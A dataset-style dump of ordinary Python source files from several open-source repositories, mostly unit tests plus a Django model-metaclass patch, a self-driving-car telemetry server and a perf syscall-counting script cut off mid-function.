repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
kcpawan/django
|
refs/heads/master
|
tests/timezones/urls.py
|
406
|
from django.conf.urls import url
from . import admin as tz_admin # NOQA: register tz_admin
urlpatterns = [
url(r'^admin/', tz_admin.site.urls),
]
|
otfbot/otfbot
|
refs/heads/master
|
otfbot/plugins/remoteCliServer/control.py
|
1
|
# This file is part of OtfBot.
#
# OtfBot is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# OtfBot is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with OtfBot; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
#
# (c) 2009 Robert Weidlich
#
# This class has basically has to provide a wrapper around controlInterface
|
trevornelson/squeeklights
|
refs/heads/master
|
simplejson/tests/test_item_sort_key.py
|
140
|
from unittest import TestCase
import simplejson as json
from operator import itemgetter
class TestItemSortKey(TestCase):
def test_simple_first(self):
a = {'a': 1, 'c': 5, 'jack': 'jill', 'pick': 'axe', 'array': [1, 5, 6, 9], 'tuple': (83, 12, 3), 'crate': 'dog', 'zeak': 'oh'}
self.assertEqual(
'{"a": 1, "c": 5, "crate": "dog", "jack": "jill", "pick": "axe", "zeak": "oh", "array": [1, 5, 6, 9], "tuple": [83, 12, 3]}',
json.dumps(a, item_sort_key=json.simple_first))
def test_case(self):
a = {'a': 1, 'c': 5, 'Jack': 'jill', 'pick': 'axe', 'Array': [1, 5, 6, 9], 'tuple': (83, 12, 3), 'crate': 'dog', 'zeak': 'oh'}
self.assertEqual(
'{"Array": [1, 5, 6, 9], "Jack": "jill", "a": 1, "c": 5, "crate": "dog", "pick": "axe", "tuple": [83, 12, 3], "zeak": "oh"}',
json.dumps(a, item_sort_key=itemgetter(0)))
self.assertEqual(
'{"a": 1, "Array": [1, 5, 6, 9], "c": 5, "crate": "dog", "Jack": "jill", "pick": "axe", "tuple": [83, 12, 3], "zeak": "oh"}',
json.dumps(a, item_sort_key=lambda kv: kv[0].lower()))
|
tscohen/chainer
|
refs/heads/master
|
tests/cupy_tests/math_tests/test_misc.py
|
4
|
import unittest
import numpy
from cupy import testing
@testing.gpu
class TestMisc(unittest.TestCase):
_multiprocess_can_split_ = True
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(atol=1e-5)
def check_unary(self, name, xp, dtype, no_bool=False):
if no_bool and numpy.dtype(dtype).char == '?':
return numpy.int_(0)
a = testing.shaped_arange((2, 3), xp, dtype)
return getattr(xp, name)(a)
@testing.for_all_dtypes()
@testing.numpy_cupy_allclose(atol=1e-5)
def check_binary(self, name, xp, dtype, no_bool=False):
if no_bool and numpy.dtype(dtype).char == '?':
return numpy.int_(0)
a = testing.shaped_arange((2, 3), xp, dtype)
b = testing.shaped_reverse_arange((2, 3), xp, dtype)
return getattr(xp, name)(a, b)
@testing.for_dtypes(['?', 'b', 'h', 'i', 'q', 'e', 'f', 'd'])
@testing.numpy_cupy_allclose(atol=1e-5)
def check_unary_negative(self, name, xp, dtype, no_bool=False):
if no_bool and numpy.dtype(dtype).char == '?':
return numpy.int_(0)
a = xp.array([-3, -2, -1, 1, 2, 3], dtype=dtype)
return getattr(xp, name)(a)
@testing.for_float_dtypes()
@testing.numpy_cupy_array_equal()
def check_binary_nan(self, name, xp, dtype):
a = xp.array([-3, numpy.NAN, -1, numpy.NAN, 0, numpy.NAN, 2],
dtype=dtype)
b = xp.array([numpy.NAN, numpy.NAN, 1, 0, numpy.NAN, -1, -2],
dtype=dtype)
return getattr(xp, name)(a, b)
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_clip1(self, xp, dtype):
a = testing.shaped_arange((2, 3, 4), xp, dtype)
return a.clip(3, 13)
@testing.for_all_dtypes()
@testing.numpy_cupy_array_equal()
def test_clip2(self, xp, dtype):
a = testing.shaped_arange((2, 3, 4), xp, dtype)
a_min = xp.array([3, 4, 5, 6], dtype=dtype)
a_max = xp.array([[10], [9], [8]], dtype=dtype)
return a.clip(a_min, a_max)
def test_sqrt(self):
self.check_unary('sqrt')
def test_square(self):
self.check_unary('square')
def test_absolute(self):
self.check_unary('absolute')
def test_absolute_negative(self):
self.check_unary_negative('absolute')
def test_sign(self):
self.check_unary('sign', no_bool=True)
def test_sign_negative(self):
self.check_unary_negative('sign', no_bool=True)
def test_maximum(self):
self.check_binary('maximum')
def test_maximum_nan(self):
self.check_binary_nan('maximum')
def test_minimum(self):
self.check_binary('minimum')
def test_minimum_nan(self):
self.check_binary_nan('minimum')
def test_fmax(self):
self.check_binary('fmax')
def test_fmax_nan(self):
self.check_binary_nan('fmax')
def test_fmin(self):
self.check_binary('fmin')
def test_fmin_nan(self):
self.check_binary_nan('fmin')
|
lenarother/moderna
|
refs/heads/master
|
tests/test_analyze/test_chain_connectivity.py
|
1
|
from unittest import main, TestCase
from Bio.PDB.PDBParser import PDBParser
from moderna.analyze.ChainConnectivity import are_residues_connected, \
is_backbone_complete, is_backbone_intact, \
is_phosphate_intact, is_backbone_congested
from moderna.ModernaStructure import ModernaStructure
from moderna.RNAResidue import RNAResidue
from test_data import *
class ChainConnectivityTests(TestCase):
def setUp(self):
"""Loads a structure to start with."""
self.t = ModernaStructure('file',MINI_TEMPLATE)
def test_is_connected_to_true(self):
"""The 3'O (n) and P (n+1) must be close together."""
connected = are_residues_connected(self.t['4'], self.t['5'])
self.assertTrue(connected)
def test_is_connected_to_false(self):
"""The 3'O (n) and P (n+1) must be close together."""
connected = are_residues_connected(self.t['4'], self.t['6'])
self.assertFalse(connected)
def test_is_connected_reverse(self):
"""Reverse order of residues changes the result."""
connected = are_residues_connected(self.t['5'], self.t['4'])
self.assertFalse(connected)
class ResidueIntegrityTests(TestCase):
def setUp(self):
"""Loads the A residue to start with."""
self.a=PDBParser().get_structure('test_struc',A_RESIDUE)[0].child_list[0].child_list[0]
self.chain=PDBParser().get_structure('test_struc',MINI_TEMPLATE)[0].child_list[0]
def test_is_backbone_complete(self):
"""Complete backbone atoms are recognized."""
for resi in self.chain:
resi = RNAResidue(resi)
self.assertTrue(is_backbone_complete(resi))
def test_backbone_incomplete(self):
"""Negative example with missing backbone atoms."""
chain=PDBParser().get_structure('test_struc',INCOMPLETE_BACKBONE)[0].child_list[0]
for resi in chain:
resi = RNAResidue(resi)
self.assertFalse(is_backbone_complete(resi))
def test_is_backbone_intact(self):
"""Check all kinds of backbone discontinuities in one residue."""
chain=PDBParser().get_structure('test_struc',BROKEN_BACKBONE)[0].child_list[0]
residues = [r for r in chain]
for resi in residues[:5]:
mr = RNAResidue(resi)
self.assertFalse(is_backbone_intact(mr))
mr = RNAResidue(chain[6])
self.assertTrue(is_backbone_intact(mr))
def test_is_backbone_intact_5p3p(self):
"""Check all kinds of backbone discontinuities in one residue."""
chain=PDBParser().get_structure('test_struc',BROKEN_BACKBONE)[0].child_list[0]
residues = [r for r in chain]
result_5p = []
result_3p = []
for resi in residues[:6]:
mr = RNAResidue(resi)
result_5p.append(is_backbone_intact(mr, mode="5'"))
result_3p.append(is_backbone_intact(mr, mode="3'"))
self.assertEqual(result_5p, [False, False, False, False, True, True])
self.assertEqual(result_3p, [True, True, True, False, False, True])
def test_is_phosphate_intact(self):
"""Check whether OP1 and OP2 are in place"""
chain=PDBParser().get_structure('test_struc',BB_MESSED_UP)[0].child_list[0]
resi1 = RNAResidue(chain[('H_c ', 32, ' ')])
resi2 = RNAResidue(chain[(' ', 33, ' ')])
self.assertTrue(is_phosphate_intact(resi1))
self.assertFalse(is_phosphate_intact(resi2))
def test_is_backbone_congested(self):
"""Check whether backbone atoms clash into rest of the structure."""
resi = RNAResidue(self.chain.child_list[2])
self.assertFalse(is_backbone_congested(resi))
# now check a structure where the backbone clashes into O2'
chain=PDBParser().get_structure('test_struc', BB_MESSED_UP)[0].child_list[0]
resi = RNAResidue(chain[('H_c ', 32, ' ')])
self.assertTrue(is_backbone_congested(resi))
resi = RNAResidue(chain[(' ', 33, ' ')])
self.assertTrue(is_backbone_congested(resi))
if __name__ == '__main__':
main()
|
michalfaber/CarND-Behavioral-Cloning
|
refs/heads/master
|
drive.py
|
1
|
import argparse
import base64
import json
import cv2
import numpy as np
import socketio
import eventlet
import eventlet.wsgi
import time
from PIL import Image
from PIL import ImageOps
from flask import Flask, render_template
from io import BytesIO
from keras.models import model_from_json
from keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array
# Fix error with Keras and TensorFlow
import tensorflow as tf
tf.python.control_flow_ops = tf
sio = socketio.Server()
app = Flask(__name__)
model = None
prev_image_array = None
def preprocess(img):
image = (cv2.resize((cv2.cvtColor(img, cv2.COLOR_RGB2HSV))[:, :, 1],
(32, 16))).reshape(1, 16, 32, 1)
return image
@sio.on('telemetry')
def telemetry(sid, data):
# The current steering angle of the car
steering_angle = data["steering_angle"]
# The current throttle of the car
throttle = data["throttle"]
# The current speed of the car
speed = data["speed"]
# The current image from the center camera of the car
imgString = data["image"]
image = Image.open(BytesIO(base64.b64decode(imgString)))
image_array = np.asarray(image)
transformed_image_array = image_array[None, :, :, :]
# preprocess input image
preprocessed = preprocess(transformed_image_array[0])
# This model currently assumes that the features of the model are just the images. Feel free to change this.
steering_angle = float(model.predict(preprocessed, batch_size=1))
# The driving model currently just outputs a constant throttle. Feel free to edit this.
throttle = 2.0
print(steering_angle, throttle)
send_control(steering_angle, throttle)
@sio.on('connect')
def connect(sid, environ):
print("connect ", sid)
send_control(0, 0)
def send_control(steering_angle, throttle):
sio.emit("steer", data={
'steering_angle': steering_angle.__str__(),
'throttle': throttle.__str__()
}, skip_sid=True)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Remote Driving')
parser.add_argument('model', type=str,
help='Path to model definition json. Model weights should be on the same path.')
args = parser.parse_args()
with open(args.model, 'r') as jfile:
model = model_from_json(jfile.read())
model.compile("adam", "mse")
weights_file = args.model.replace('json', 'h5')
model.load_weights(weights_file)
# wrap Flask application with engineio's middleware
app = socketio.Middleware(sio, app)
# deploy as an eventlet WSGI server
eventlet.wsgi.server(eventlet.listen(('', 4567)), app)
|
teamfx/openjfx-10-dev-rt
|
refs/heads/master
|
modules/javafx.web/src/main/native/Tools/Scripts/webkitpy/port/image_diff_unittest.py
|
3
|
# Copyright (C) 2012 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit testing base class for Port implementations."""
import unittest
from webkitpy.port.server_process_mock import MockServerProcess
from webkitpy.port.image_diff import ImageDiffer
class FakePort(object):
def __init__(self, server_process_output):
self._server_process_constructor = lambda port, nm, cmd, env: MockServerProcess(lines=server_process_output)
def _path_to_image_diff(self):
return ''
def setup_environ_for_server(self, nm):
return None
class TestImageDiffer(unittest.TestCase):
def test_diff_image_failed(self):
port = FakePort(['diff: 100% failed\n'])
image_differ = ImageDiffer(port)
self.assertEqual(image_differ.diff_image('foo', 'bar', 0.1), ('', 100.0, None))
def test_diff_image_passed(self):
port = FakePort(['diff: 0% passed\n'])
image_differ = ImageDiffer(port)
self.assertEqual(image_differ.diff_image('foo', 'bar', 0.1), (None, 0, None))
|
htwenhe/DJOA
|
refs/heads/master
|
env/Lib/site-packages/django/db/backends/base/validation.py
|
393
|
class BaseDatabaseValidation(object):
"""
This class encapsulates all backend-specific model validation.
"""
def __init__(self, connection):
self.connection = connection
def check_field(self, field, **kwargs):
return []
|
vikas1885/test1
|
refs/heads/master
|
cms/djangoapps/contentstore/management/commands/clone_course.py
|
119
|
"""
Script for cloning a course
"""
from django.core.management.base import BaseCommand, CommandError
from xmodule.modulestore.django import modulestore
from student.roles import CourseInstructorRole, CourseStaffRole
from opaque_keys.edx.keys import CourseKey
from opaque_keys import InvalidKeyError
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from xmodule.modulestore import ModuleStoreEnum
#
# To run from command line: ./manage.py cms clone_course --settings=dev master/300/cough edx/111/foo
#
class Command(BaseCommand):
"""Clone a MongoDB-backed course to another location"""
help = 'Clone a MongoDB backed course to another location'
def course_key_from_arg(self, arg):
"""
Convert the command line arg into a course key
"""
try:
return CourseKey.from_string(arg)
except InvalidKeyError:
return SlashSeparatedCourseKey.from_deprecated_string(arg)
def handle(self, *args, **options):
"Execute the command"
if len(args) != 2:
raise CommandError("clone requires 2 arguments: <source-course_id> <dest-course_id>")
source_course_id = self.course_key_from_arg(args[0])
dest_course_id = self.course_key_from_arg(args[1])
mstore = modulestore()
print("Cloning course {0} to {1}".format(source_course_id, dest_course_id))
with mstore.bulk_operations(dest_course_id):
if mstore.clone_course(source_course_id, dest_course_id, ModuleStoreEnum.UserID.mgmt_command):
print("copying User permissions...")
# purposely avoids auth.add_user b/c it doesn't have a caller to authorize
CourseInstructorRole(dest_course_id).add_users(
*CourseInstructorRole(source_course_id).users_with_role()
)
CourseStaffRole(dest_course_id).add_users(
*CourseStaffRole(source_course_id).users_with_role()
)
|
danieljaouen/ansible
|
refs/heads/devel
|
test/units/module_utils/basic/test_run_command.py
|
86
|
# -*- coding: utf-8 -*-
# Copyright (c) 2017 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Make coding more python3-ish
from __future__ import (absolute_import, division)
__metaclass__ = type
import errno
from itertools import product
from io import BytesIO
import pytest
from ansible.module_utils._text import to_native
class OpenBytesIO(BytesIO):
"""BytesIO with dummy close() method
So that you can inspect the content after close() was called.
"""
def close(self):
pass
@pytest.fixture
def mock_os(mocker):
def mock_os_read(fd, nbytes):
return os._cmd_out[fd].read(nbytes)
def mock_os_chdir(path):
if path == '/inaccessible':
raise OSError(errno.EPERM, "Permission denied: '/inaccessible'")
def mock_os_abspath(path):
if path.startswith('/'):
return path
else:
return os.getcwd.return_value + '/' + path
os = mocker.patch('ansible.module_utils.basic.os')
os._cmd_out = {
# os.read() is returning 'bytes', not strings
mocker.sentinel.stdout: BytesIO(),
mocker.sentinel.stderr: BytesIO(),
}
os.path.expandvars.side_effect = lambda x: x
os.path.expanduser.side_effect = lambda x: x
os.environ = {'PATH': '/bin'}
os.getcwd.return_value = '/home/foo'
os.path.isdir.return_value = True
os.chdir.side_effect = mock_os_chdir
os.read.side_effect = mock_os_read
os.path.abspath.side_effect = mock_os_abspath
yield os
@pytest.fixture
def mock_subprocess(mocker):
def mock_select(rlist, wlist, xlist, timeout=1):
return (rlist, [], [])
fake_select = mocker.patch('ansible.module_utils.basic.select')
fake_select.select.side_effect = mock_select
subprocess = mocker.patch('ansible.module_utils.basic.subprocess')
cmd = mocker.MagicMock()
cmd.returncode = 0
cmd.stdin = OpenBytesIO()
cmd.stdout.fileno.return_value = mocker.sentinel.stdout
cmd.stderr.fileno.return_value = mocker.sentinel.stderr
subprocess.Popen.return_value = cmd
yield subprocess
@pytest.fixture()
def rc_am(mocker, am, mock_os, mock_subprocess):
am.fail_json = mocker.MagicMock(side_effect=SystemExit)
am._os = mock_os
am._subprocess = mock_subprocess
yield am
class TestRunCommandArgs:
# Format is command as passed to run_command, command to Popen as list, command to Popen as string
ARGS_DATA = (
(['/bin/ls', 'a', 'b', 'c'], ['/bin/ls', 'a', 'b', 'c'], '/bin/ls a b c'),
('/bin/ls a " b" "c "', ['/bin/ls', 'a', ' b', 'c '], '/bin/ls a " b" "c "'),
)
# pylint bug: https://github.com/PyCQA/pylint/issues/511
# pylint: disable=undefined-variable
@pytest.mark.parametrize('cmd, expected, shell, stdin',
((arg, cmd_str if sh else cmd_lst, sh, {})
for (arg, cmd_lst, cmd_str), sh in product(ARGS_DATA, (True, False))),
indirect=['stdin'])
def test_args(self, cmd, expected, shell, rc_am):
rc_am.run_command(cmd, use_unsafe_shell=shell)
assert rc_am._subprocess.Popen.called
args, kwargs = rc_am._subprocess.Popen.call_args
assert args == (expected, )
assert kwargs['shell'] == shell
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_tuple_as_args(self, rc_am):
with pytest.raises(SystemExit):
rc_am.run_command(('ls', '/'))
assert rc_am.fail_json.called
class TestRunCommandCwd:
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_cwd(self, mocker, rc_am):
rc_am._os.getcwd.return_value = '/old'
rc_am.run_command('/bin/ls', cwd='/new')
assert rc_am._os.chdir.mock_calls == [mocker.call('/new'), mocker.call('/old'), ]
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_cwd_relative_path(self, mocker, rc_am):
rc_am._os.getcwd.return_value = '/old'
rc_am.run_command('/bin/ls', cwd='sub-dir')
assert rc_am._os.chdir.mock_calls == [mocker.call('/old/sub-dir'), mocker.call('/old'), ]
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_cwd_not_a_dir(self, mocker, rc_am):
rc_am._os.getcwd.return_value = '/old'
rc_am._os.path.isdir.side_effect = lambda d: d != '/not-a-dir'
rc_am.run_command('/bin/ls', cwd='/not-a-dir')
assert rc_am._os.chdir.mock_calls == [mocker.call('/old'), ]
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_cwd_inaccessible(self, rc_am):
with pytest.raises(SystemExit):
rc_am.run_command('/bin/ls', cwd='/inaccessible')
assert rc_am.fail_json.called
args, kwargs = rc_am.fail_json.call_args
assert kwargs['rc'] == errno.EPERM
class TestRunCommandPrompt:
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_prompt_bad_regex(self, rc_am):
with pytest.raises(SystemExit):
rc_am.run_command('foo', prompt_regex='[pP)assword:')
assert rc_am.fail_json.called
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_prompt_no_match(self, mocker, rc_am):
rc_am._os._cmd_out[mocker.sentinel.stdout] = BytesIO(b'hello')
(rc, _, _) = rc_am.run_command('foo', prompt_regex='[pP]assword:')
assert rc == 0
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_prompt_match_wo_data(self, mocker, rc_am):
rc_am._os._cmd_out[mocker.sentinel.stdout] = BytesIO(b'Authentication required!\nEnter password: ')
(rc, _, _) = rc_am.run_command('foo', prompt_regex=r'[pP]assword:', data=None)
assert rc == 257
class TestRunCommandRc:
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_check_rc_false(self, rc_am):
rc_am._subprocess.Popen.return_value.returncode = 1
(rc, _, _) = rc_am.run_command('/bin/false', check_rc=False)
assert rc == 1
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_check_rc_true(self, rc_am):
rc_am._subprocess.Popen.return_value.returncode = 1
with pytest.raises(SystemExit):
rc_am.run_command('/bin/false', check_rc=True)
assert rc_am.fail_json.called
args, kwargs = rc_am.fail_json.call_args
assert kwargs['rc'] == 1
class TestRunCommandOutput:
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_text_stdin(self, rc_am):
(rc, stdout, stderr) = rc_am.run_command('/bin/foo', data='hello world')
assert rc_am._subprocess.Popen.return_value.stdin.getvalue() == b'hello world\n'
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_ascii_stdout(self, mocker, rc_am):
rc_am._os._cmd_out[mocker.sentinel.stdout] = BytesIO(b'hello')
(rc, stdout, stderr) = rc_am.run_command('/bin/cat hello.txt')
assert rc == 0
# module_utils function. On py3 it returns text and py2 it returns
# bytes because it's returning native strings
assert stdout == 'hello'
@pytest.mark.parametrize('stdin', [{}], indirect=['stdin'])
def test_utf8_output(self, mocker, rc_am):
rc_am._os._cmd_out[mocker.sentinel.stdout] = BytesIO(u'Žarn§'.encode('utf-8'))
rc_am._os._cmd_out[mocker.sentinel.stderr] = BytesIO(u'لرئيسية'.encode('utf-8'))
(rc, stdout, stderr) = rc_am.run_command('/bin/something_ugly')
assert rc == 0
# module_utils function. On py3 it returns text and py2 it returns
# bytes because it's returning native strings
assert stdout == to_native(u'Žarn§')
assert stderr == to_native(u'لرئيسية')
|
TheTypoMaster/evennia
|
refs/heads/master
|
evennia/typeclasses/django_new_patch.py
|
6
|
"""
This is a patch of django.db.models.base.py:__new__, to allow for the
proxy system to allow multiple inheritance when both parents are of
the same base model.
This patch is implemented as per
https://code.djangoproject.com/ticket/11560 and will hopefully be
possibe to remove as it gets adde to django's main branch.
"""
# django patch imports
import sys
import copy
import warnings
from django.apps import apps
from django.db.models.base import ModelBase, subclass_exception
from django.core.exceptions import ObjectDoesNotExist
from django.db.models.options import Options
from django.utils.deprecation import RemovedInDjango19Warning
from django.core.exceptions import MultipleObjectsReturned, FieldError
from django.apps.config import MODELS_MODULE_NAME
from django.db.models.fields.related import OneToOneField
#/ django patch imports
def patched_new(cls, name, bases, attrs):
"Patched version of __new__"
super_new = super(ModelBase, cls).__new__
# Also ensure initialization is only performed for subclasses of Model
# (excluding Model class itself).
parents = [b for b in bases if isinstance(b, ModelBase)]
if not parents:
return super_new(cls, name, bases, attrs)
# Create the class.
module = attrs.pop('__module__')
new_class = super_new(cls, name, bases, {'__module__': module})
attr_meta = attrs.pop('Meta', None)
abstract = getattr(attr_meta, 'abstract', False)
if not attr_meta:
meta = getattr(new_class, 'Meta', None)
else:
meta = attr_meta
base_meta = getattr(new_class, '_meta', None)
# Look for an application configuration to attach the model to.
app_config = apps.get_containing_app_config(module)
if getattr(meta, 'app_label', None) is None:
if app_config is None:
# If the model is imported before the configuration for its
# application is created (#21719), or isn't in an installed
# application (#21680), use the legacy logic to figure out the
# app_label by looking one level up from the package or module
# named 'models'. If no such package or module exists, fall
# back to looking one level up from the module this model is
# defined in.
# For 'django.contrib.sites.models', this would be 'sites'.
# For 'geo.models.places' this would be 'geo'.
msg = (
"Model class %s.%s doesn't declare an explicit app_label "
"and either isn't in an application in INSTALLED_APPS or "
"else was imported before its application was loaded. " %
(module, name))
if abstract:
msg += "Its app_label will be set to None in Django 1.9."
else:
msg += "This will no longer be supported in Django 1.9."
warnings.warn(msg, RemovedInDjango19Warning, stacklevel=2)
model_module = sys.modules[new_class.__module__]
package_components = model_module.__name__.split('.')
package_components.reverse() # find the last occurrence of 'models'
try:
app_label_index = package_components.index(MODELS_MODULE_NAME) + 1
except ValueError:
app_label_index = 1
kwargs = {"app_label": package_components[app_label_index]}
else:
kwargs = {"app_label": app_config.label}
else:
kwargs = {}
new_class.add_to_class('_meta', Options(meta, **kwargs))
if not abstract:
new_class.add_to_class(
'DoesNotExist',
subclass_exception(
str('DoesNotExist'),
tuple(x.DoesNotExist for x in parents if hasattr(x, '_meta') and not x._meta.abstract) or (ObjectDoesNotExist,),
module,
attached_to=new_class))
new_class.add_to_class(
'MultipleObjectsReturned',
subclass_exception(
str('MultipleObjectsReturned'),
tuple(x.MultipleObjectsReturned for x in parents if hasattr(x, '_meta') and not x._meta.abstract) or (MultipleObjectsReturned,),
module,
attached_to=new_class))
if base_meta and not base_meta.abstract:
# Non-abstract child classes inherit some attributes from their
# non-abstract parent (unless an ABC comes before it in the
# method resolution order).
if not hasattr(meta, 'ordering'):
new_class._meta.ordering = base_meta.ordering
if not hasattr(meta, 'get_latest_by'):
new_class._meta.get_latest_by = base_meta.get_latest_by
is_proxy = new_class._meta.proxy
# If the model is a proxy, ensure that the base class
# hasn't been swapped out.
if is_proxy and base_meta and base_meta.swapped:
raise TypeError("%s cannot proxy the swapped model '%s'." % (name, base_meta.swapped))
if getattr(new_class, '_default_manager', None):
if not is_proxy:
# Multi-table inheritance doesn't inherit default manager from
# parents.
new_class._default_manager = None
new_class._base_manager = None
else:
# Proxy classes do inherit parent's default manager, if none is
# set explicitly.
new_class._default_manager = new_class._default_manager._copy_to_model(new_class)
new_class._base_manager = new_class._base_manager._copy_to_model(new_class)
# Add all attributes to the class.
for obj_name, obj in attrs.items():
new_class.add_to_class(obj_name, obj)
# All the fields of any type declared on this model
new_fields = (
new_class._meta.local_fields +
new_class._meta.local_many_to_many +
new_class._meta.virtual_fields
)
field_names = set(f.name for f in new_fields)
# Basic setup for proxy models.
if is_proxy:
base = None
for parent in [kls for kls in parents if hasattr(kls, '_meta')]:
if parent._meta.abstract:
if parent._meta.fields:
raise TypeError("Abstract base class containing model fields not permitted for proxy model '%s'." % name)
else:
continue
#if base is not None: # patch
while parent._meta.proxy: # patch
parent = parent._meta.proxy_for_model # patch
if base is not None and base is not parent: # patch
raise TypeError("Proxy model '%s' has more than one non-abstract model base class." % name)
else:
base = parent
if base is None:
raise TypeError("Proxy model '%s' has no non-abstract model base class." % name)
new_class._meta.setup_proxy(base)
new_class._meta.concrete_model = base._meta.concrete_model
else:
new_class._meta.concrete_model = new_class
# Collect the parent links for multi-table inheritance.
parent_links = {}
for base in reversed([new_class] + parents):
# Conceptually equivalent to `if base is Model`.
if not hasattr(base, '_meta'):
continue
# Skip concrete parent classes.
if base != new_class and not base._meta.abstract:
continue
# Locate OneToOneField instances.
for field in base._meta.local_fields:
if isinstance(field, OneToOneField):
parent_links[field.rel.to] = field
# Do the appropriate setup for any model parents.
for base in parents:
original_base = base
if not hasattr(base, '_meta'):
# Things without _meta aren't functional models, so they're
# uninteresting parents.
continue
parent_fields = base._meta.local_fields + base._meta.local_many_to_many
# Check for clashes between locally declared fields and those
# on the base classes (we cannot handle shadowed fields at the
# moment).
for field in parent_fields:
if field.name in field_names:
raise FieldError(
'Local field %r in class %r clashes '
'with field of similar name from '
'base class %r' % (field.name, name, base.__name__)
)
if not base._meta.abstract:
# Concrete classes...
base = base._meta.concrete_model
if base in parent_links:
field = parent_links[base]
elif not is_proxy:
attr_name = '%s_ptr' % base._meta.model_name
field = OneToOneField(base, name=attr_name,
auto_created=True, parent_link=True)
# Only add the ptr field if it's not already present;
# e.g. migrations will already have it specified
if not hasattr(new_class, attr_name):
new_class.add_to_class(attr_name, field)
else:
field = None
new_class._meta.parents[base] = field
else:
# .. and abstract ones.
for field in parent_fields:
new_class.add_to_class(field.name, copy.deepcopy(field))
# Pass any non-abstract parent classes onto child.
new_class._meta.parents.update(base._meta.parents)
# Inherit managers from the abstract base classes.
new_class.copy_managers(base._meta.abstract_managers)
# Proxy models inherit the non-abstract managers from their base,
# unless they have redefined any of them.
if is_proxy:
new_class.copy_managers(original_base._meta.concrete_managers)
# Inherit virtual fields (like GenericForeignKey) from the parent
# class
for field in base._meta.virtual_fields:
if base._meta.abstract and field.name in field_names:
raise FieldError(
'Local field %r in class %r clashes '
'with field of similar name from '
'abstract base class %r' % (field.name, name, base.__name__)
)
new_class.add_to_class(field.name, copy.deepcopy(field))
if abstract:
# Abstract base models can't be instantiated and don't appear in
# the list of models for an app. We do the final setup for them a
# little differently from normal models.
attr_meta.abstract = False
new_class.Meta = attr_meta
return new_class
new_class._prepare()
new_class._meta.apps.register_model(new_class._meta.app_label, new_class)
return new_class
|
abgoyal/zen_u105_kernel
|
refs/heads/master
|
tools/perf/scripts/python/sctop.py
|
11180
|
# system call top
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Periodically displays system-wide system call totals, broken down by
# syscall. If a [comm] arg is specified, only syscalls called by
# [comm] are displayed. If an [interval] arg is specified, the display
# will be refreshed every [interval] seconds. The default interval is
# 3 seconds.
import os, sys, thread, time
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
from Util import *
usage = "perf script -s sctop.py [comm] [interval]\n";
for_comm = None
default_interval = 3
interval = default_interval
if len(sys.argv) > 3:
sys.exit(usage)
if len(sys.argv) > 2:
for_comm = sys.argv[1]
interval = int(sys.argv[2])
elif len(sys.argv) > 1:
try:
interval = int(sys.argv[1])
except ValueError:
for_comm = sys.argv[1]
interval = default_interval
syscalls = autodict()
def trace_begin():
thread.start_new_thread(print_syscall_totals, (interval,))
pass
def raw_syscalls__sys_enter(event_name, context, common_cpu,
common_secs, common_nsecs, common_pid, common_comm,
id, args):
if for_comm is not None:
if common_comm != for_comm:
return
try:
syscalls[id] += 1
except TypeError:
syscalls[id] = 1
def print_syscall_totals(interval):
while 1:
clear_term()
if for_comm is not None:
